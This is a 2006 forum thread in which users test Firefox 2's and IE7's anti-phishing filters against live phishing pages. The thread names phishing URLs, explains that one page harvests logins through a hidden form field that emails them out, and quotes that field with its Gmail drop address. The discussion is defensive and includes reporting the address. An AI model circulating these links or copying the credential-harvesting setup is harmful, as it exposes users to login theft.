superhuman Posted October 27, 2006 Share Posted October 27, 2006 (edited) I came across and got to know a phising website: http://www.geocities.com/playboy_model_wit_big_boobs/ Firefox 2 completely fails to detect it is a phising site. While IE7 reports it as "Suspicious Web site". I think Firefox2 Anti-phising is just simply a joke. They have no idea what hat they have built :no: Test yourself! WARNING: DO NOT ENTER YOUR USERNAME AND PASSWORD UPDATE: NO NEED TO TEST ANYMORE Because some Firefox Supporters have reported this website to Firefox. That way FF2 now displays message of Suspicious Website. The point is that a true Anti-Phising tool needs to have the ability to check the website and identify potential risk, not just checking against Centralized Database like firefox 2. FF2 Development team needs to learn from IE and improve their Anti-phising function. That is the bottom line. Edited October 27, 2006 by superhuman Link to comment Share on other sites More sharing options...
primexx Posted October 27, 2006 Share Posted October 27, 2006 You JUST figured that out? LOL. Just about everyone knows that Firefox's phishing filter does nothing. Link to comment Share on other sites More sharing options...
HoochieMamma Posted October 27, 2006 Share Posted October 27, 2006 Have you selected it to use Googles antiphishing tech? Link to comment Share on other sites More sharing options...
RangerLG Posted October 27, 2006 Share Posted October 27, 2006 It doesn't warn with either technology selected. I wonder if it doesn't work because the login page is actually a correct page. The submit button is the one that redirects the username/password. Link to comment Share on other sites More sharing options...
primexx Posted October 27, 2006 Share Posted October 27, 2006 It doesn't warn with either technology selected. I wonder if it doesn't work because the login page is actually a correct page. The submit button is the one that redirects the username/password. no the Firefox phishing filter is flawed, it's true. Link to comment Share on other sites More sharing options...
Ponto.com Posted October 27, 2006 Share Posted October 27, 2006 It doesn't work for me neither. Even with the Google check option. I've only seen it working on that Google test page. Link to comment Share on other sites More sharing options...
JustGeorge Posted October 27, 2006 Share Posted October 27, 2006 Surely this is just an oversight? Anti-phishing was a much advertised feature in FF2 so I doubt it is completely useless. Link to comment Share on other sites More sharing options...
superhuman Posted October 27, 2006 Author Share Posted October 27, 2006 if you check the source, this guy uses hidden textbox to store your username & password then send email to him. Ok, here is the story. They advertised FF2 anti-phising alot. So I decided to try out. It is completely useless. Link to comment Share on other sites More sharing options...
flyakite Posted October 27, 2006 Share Posted October 27, 2006 (edited) if you check the source, this guy uses hidden textbox to store your username & password then send email to him. Ok, here is the story. They advertised FF2 anti-phising alot. So I decided to try out. It is completely useless. It never hurts to educate yourself. #2 at http://en-us.www.mozilla.com/en-US/firefox...ing-protection/ It says it works by checking the url against a list of KNOWN phishing sites. "Known" is obviously the key word here. Also most phishing sites try to disguise their url by using subdomains etc. with enough garbage that it makes you think you're at a legit URL. One look at that URL and even the most computer illiterate person should be able to tell that's not legit. Fact of the matter is, if it's not in Mozilla's list of known phishing sites, it's obviously not gonna get caught. If you want to submit a site, go to Help > Report Web Forgery. Edited October 27, 2006 by flyakite Link to comment Share on other sites More sharing options...
superhuman Posted October 27, 2006 Author Share Posted October 27, 2006 It never hurts to educate yourself. #2 at http://en-us.www.mozilla.com/en-US/firefox...ing-protection/ It says it works by checking the url against a list of KNOWN phishing sites. "Known" is obviously the key word here. Also most phishing sites try to disguise their url by using subdomains etc. with enough garbage that it makes you think you're at a legit URL. One look at that URL and even the most computer illiterate person should be able to tell that's not legit. Fact of the matter is, if it's not in Mozilla's list of known phishing sites, it's obviously not gonna get caught. If you want to submit a site, go to Help > Report Web Forgery. No, you're WRONG The point is that even IE7 did not have that url reported. It still can detect "Suspicious Website." And that is anti-phising. Not just checking url against centralized database like Firefox does. The way FF2 implement this technology is completely useless in case of new threat. Link to comment Share on other sites More sharing options...
Swift_Monkey Posted October 27, 2006 Share Posted October 27, 2006 Firefox 2 did not work here either. :no: Just having a look at the code for that site. It appears all the logins get sent to his gmail address. :angry: Link to comment Share on other sites More sharing options...
Leddy Posted October 27, 2006 Share Posted October 27, 2006 Looks like Mozilla has some homework to do. "Learn from Microsoft." Link to comment Share on other sites More sharing options...
Tokar Posted October 27, 2006 Share Posted October 27, 2006 Besides the fact that we are all aware of the fact that it is a phishing site, the new Yahoo login page (for mail, or geocities, or any page which has a yahoo login feature) has protection built in. You upload an image to yahoo, and they create a cookie which shows that image next to the login form. If the image is there, you know you can trust the login form to be an official yahoo one. If no picture is there, then you know its a fake...mind i note the picture is a per-computer setting. Link to comment Share on other sites More sharing options...
Ritalin Posted October 27, 2006 Share Posted October 27, 2006 lol @ the email address the stuff is sent to. megarofl. Link to comment Share on other sites More sharing options...
Tarzan Posted October 27, 2006 Share Posted October 27, 2006 Test more here http://www.dslreports.com/phishtrack?pid=5122&urls=1 Seems to work just fine. Only a matter of detection rate like with AV - can change. If the offline database or online Google one does not screw up Firefox be happy. None of them picked up 5123, in few minutes they probably will. Need lots more stats over a longer periode to claim either one is perfect or useless. Link to comment Share on other sites More sharing options...
oscarntommy Posted October 27, 2006 Share Posted October 27, 2006 (edited) FF2's Anti-Phishing is not totally a joke... FF2 can detect that http://220.133.110.36/~perrypeng/.ws/eBayI...migrateVisitor/ is a phishing site while IE7 did nothing, not even a single warning. IT'S A PHISHING WEBISTE Edited October 27, 2006 by oscarntommy Link to comment Share on other sites More sharing options...
ozgeek Posted October 27, 2006 Share Posted October 27, 2006 What? :unsure: Link to comment Share on other sites More sharing options...
DomZ Posted October 27, 2006 Share Posted October 27, 2006 I guess it is now "known" :p Link to comment Share on other sites More sharing options...
Jesse Carlton Posted October 27, 2006 Share Posted October 27, 2006 ...hence the system works, find a problem, report it, and it's there. Link to comment Share on other sites More sharing options...
Nighthawk-F117 Posted October 27, 2006 Share Posted October 27, 2006 FF2's Anti-Phishing is not totally a joke... FF2 can detect that http://220.133.110.36/~perrypeng/.ws/eBayI...migrateVisitor/ is a phishing site while IE7 did nothing, not even a single warning. IT'S A PHISHING WEBISTE That's where you're wrong. Link to comment Share on other sites More sharing options...
noroom Posted October 27, 2006 Share Posted October 27, 2006 Works for me. Guess they updated their filters? Link to comment Share on other sites More sharing options...
whitebread Posted October 27, 2006 Share Posted October 27, 2006 I have no idea what y'all are talking about. I went to the site and got a big honkin' warning it was fake. :rolleyes: Link to comment Share on other sites More sharing options...
zeroday Posted October 27, 2006 Share Posted October 27, 2006 The filter works for me. BTW, the email address it goes to: NAME="Mail_To" VALUE="owning.lamers@gmail.com"> Someone should report this to gmail as well. Link to comment Share on other sites More sharing options...
User6060 Posted October 27, 2006 Share Posted October 27, 2006 Both Work Fine for me Link to comment Share on other sites More sharing options...
BigDaddy5 Posted October 27, 2006 Share Posted October 27, 2006 The filter works for me. BTW, the email address it goes to: NAME="Mail_To" VALUE="owning.lamers@gmail.com"> Someone should report this to gmail as well. I went ahead and did that. Feel free to, as well, here: https://services.google.com/inquiry/gmail_security4 I just put in N/A for all the e-mail parts, and then explained the url in the 'additional comments' section. Link to comment Share on other sites More sharing options...
Recommended Posts